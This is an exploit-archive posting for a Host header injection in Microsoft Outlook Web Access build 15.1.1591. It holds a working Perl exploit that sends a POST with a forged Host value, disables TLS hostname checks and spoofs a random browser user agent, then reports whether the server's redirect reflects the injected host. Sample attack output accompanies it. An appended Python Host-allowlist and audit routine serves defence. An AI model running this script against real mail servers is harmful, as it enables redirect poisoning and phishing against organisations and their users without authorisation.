Microsoft Outlook Web Access Build 15.1.1591 Header Injection
Posted Sep 2, 2019
Authored by Todor Donev

Microsoft Outlook Web Access build 15.1.1591 suffers from a remote host header injection vulnerability.

tags | exploit, remote, web
MD5 | 83e1a1d05799abc8fa7716f9dca9a040

#!/usr/bin/perl -w
#
# Microsoft Outlook Web Access build:15.1.1591 Remote Header 'Host' Injection Exploit
#
# Copyright 2019 (c) Todor Donev <todor.donev at gmail.com>
#
#
# Disclaimer:
# This or previous programs are for Educational purpose ONLY. Do not use it without permission.
# The usual disclaimer applies, especially the fact that Todor Donev is not liable for any damages
# caused by direct or indirect use of the information or functionality provided by these programs.
# The author or any Internet provider bears NO responsibility for content or misuse of these programs
# or any derivatives thereof. By using these programs you accept the fact that any damage (dataloss,
# system crash, system compromise, etc.) caused by the use of these programs are not Todor Donev's
# responsibility.
#
# Use them at your own risk!
#
# [test@localhost microsoft_owa]$ perl microsoft_owa.pl https://133.71.33.37/
# [+] Microsoft Outlook Web Access build:15.1.1591 Remote Header 'Host' Injection Exploit
# =======================================================================================
# [!] Author: Todor Donev <todor.donev@gmail.com>
# =======================================================================================
# [+] > Host: sultan-of-swing
# [+] > User-Agent: Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.6) Gecko/20040406 Galeon/1.3.15
# [+] > Content-Type: application/x-www-form-urlencoded
# [+] < Cache-Control: no-cache
# [+] < Connection: close
# [+] < Date: Sat, 31 Aug 0000 13:37:00 GMT
# [+] < Pragma: no-cache
# [+] < Location: https://sultan-of-swing/owa/
# [+] < Server: Microsoft-IIS/10.0
# [+] < Content-Length: 0
# [+] < Client-Date: Sat, 31 Aug 0000 13:37:00 GMT
# [+] < Client-Peer: 133.71.33.37:443
# [+] < Client-Response-Num: 1
# [+] < Client-SSL-Cert-Issuer: CENSORED
# [+] < Client-SSL-Cert-Subject: CENSORED
# [+] < Client-SSL-Cipher: ECDHE-RSA-AES128-GCM-SHA256
# [+] < Client-SSL-Socket-Class: IO::Socket::SSL
# [+] < Client-SSL-Warning: Peer certificate not verified
# [+] < X-FEServer: MAILSVRTEST
# [+] < X-RequestId: CENSORED
# =======================================================================================
# [+] Microsoft OWA Location is Injected => https://sultan-of-swing/owa/
#
# Description:
# OWASP Testing for HTTP Splitting/Smuggling (OTG-INPVAL-016)
# https://www.owasp.org/index.php/Testing_for_HTTP_Splitting/Smuggling_(OTG-INPVAL-016)
#
#

use strict;
use v5.10;
use HTTP::Request;
use LWP::UserAgent;
use WWW::UserAgent::Random;


my $host = shift || 'https://192.168.1.1:443/';

printf ("[+] Microsoft Outlook Web Access build:15.1.1591 Remote Header 'Host' Injection Exploit\n");
printf ("=======================================================================================\n");
printf ("[!] Author: Todor Donev <todor.donev\@gmail.com>\n");
printf ("[?] e.g. perl $0 https://target:port/\n") and exit if ($host !~ m/^http/);

# Random browser User-Agent; TLS hostname verification is disabled (see ssl_opts)
my $user_agent = rand_ua("browsers");
my $browser = LWP::UserAgent->new(
    protocols_allowed => ['http', 'https'],
    ssl_opts          => { verify_hostname => 0 }
);
$browser->timeout(10);
$browser->agent($user_agent);

# POST with an overridden Host header value
my $request = HTTP::Request->new (POST => $host,
    [ Content_Type => "application/x-www-form-urlencoded",
      Host         => "sultan-of-swing" ], " ");
printf ("=======================================================================================\n");
my $response = $browser->request($request);

# The Location header is absent when the server does not redirect
my $location = $response->header('Location') // '';
if ($location =~ m/sultan-of-swing/i){

    say "[+] > $_: ", $request->header($_) for $request->header_field_names;
    say "[+] < $_: ", $response->header($_) for $response->header_field_names;
    printf ("=======================================================================================\n");
    printf ("[+] Microsoft OWA Location is Injected => %s\n", $location);
    exit;

} else {

    printf ("[-] Exploit failed!\n");
    exit;

}
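
A defensive counterpart, added here and not part of the original advisory or script: a Host header allowlist check of the kind a reverse proxy in front of OWA could apply, plus an audit function that flags the behaviour in the sample output above (a Location built from the supplied Host). The hostnames in ALLOWED_HOSTS and all function names are assumptions.

```python
from urllib.parse import urlsplit

# Assumption: the names this OWA front end is published under (constructed).
ALLOWED_HOSTS = {"mail.example.com", "owa.example.com"}


def normalize_host(value):
    """Return the lowercase hostname from a Host header value, or None if malformed."""
    if not value or any(c in value for c in " \t\r\n@\\"):
        return None
    try:
        parts = urlsplit("//" + value)
        parts.port  # raises ValueError for a non-numeric or out-of-range port
    except ValueError:
        return None
    if parts.netloc != value or not parts.hostname:
        return None  # path, query or fragment characters inside the header
    return parts.hostname.rstrip(".")


def host_allowed(host_header, allowed=ALLOWED_HOSTS):
    """Gate to apply before the request reaches the application."""
    return normalize_host(host_header) in allowed


def audit_redirect(host_header, location, allowed=ALLOWED_HOSTS):
    """Classify one request/response pair taken from a proxy log."""
    target = urlsplit(location or "").hostname
    if target is None or target in allowed:
        return "ok"  # relative, absent, or pointing at a published name
    if target == normalize_host(host_header):
        return "reflected-host"  # absolute URL built from the client-supplied Host
    return "external-redirect"


if __name__ == "__main__":
    # Constructed pairs; the first mirrors the sample output in the script header.
    pairs = [
        ("sultan-of-swing", "https://sultan-of-swing/owa/"),
        ("mail.example.com", "https://mail.example.com/owa/"),
        ("MAIL.example.com:443", "/owa/"),
    ]
    for host, location in pairs:
        print(host, host_allowed(host), audit_redirect(host, location))
```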
